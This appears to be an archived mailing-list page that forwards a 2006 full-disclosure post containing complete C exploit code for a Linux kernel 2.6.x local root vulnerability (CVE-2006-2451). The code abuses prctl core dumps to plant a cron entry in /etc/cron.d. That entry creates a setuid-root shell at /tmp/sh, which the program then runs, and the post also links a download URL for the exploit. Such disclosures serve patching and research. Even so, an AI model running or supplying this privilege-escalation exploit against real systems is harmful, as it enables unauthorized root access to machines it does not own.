ðòïåëôù 

  áòèé÷ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 

  ðåòóïîáìøîïå 

  ðòïçòáííù 

ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )

> -----Original Message-----
> From: Roman Medina-Heigl Hernandez [mailto:roman@xxxxxxxxxxx] 
> Sent: Wednesday, July 12, 2006 4:16 AM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx; submit@xxxxxxxxxxx
> Subject: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local 
> r00t Exploit ( BID 18874 / CVE-2006-2451 )
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Maybe this is obvious for Paul Starzetz (as well as many 
> other people) but
> full-disclosure is not really "full" without exploit code.
> 
> Working exploit attached. You can also download it from:
> http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c
> 
> Greetz to !dSR ppl :-)
> 
> - --
> 
> Saludos,
> - -Roman
> 
> PGP Fingerprint:
> 09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
> [Key ID: 0xEAD56742. Available at KeyServ]
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (MingW32)
> 
> iD8DBQFEtD815H+KferVZ0IRAjhKAKCtHnTCwV0D/kH3dt0HItQUPZ/JegCglaQM
> vO8VFJyxf+EXy2buqTK4kVM=
> =dzRm
> -----END PGP SIGNATURE-----
> 

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@xxxxxxxxxx>   (main PoC code)   */
/* - RoMaNSoFt <roman@xxxxxxxxxxx> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char 
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
 * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh 
; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) 
...\n");
    system("/tmp/sh -i");
}

 



Copyright © Lexa Software, 1996-2009.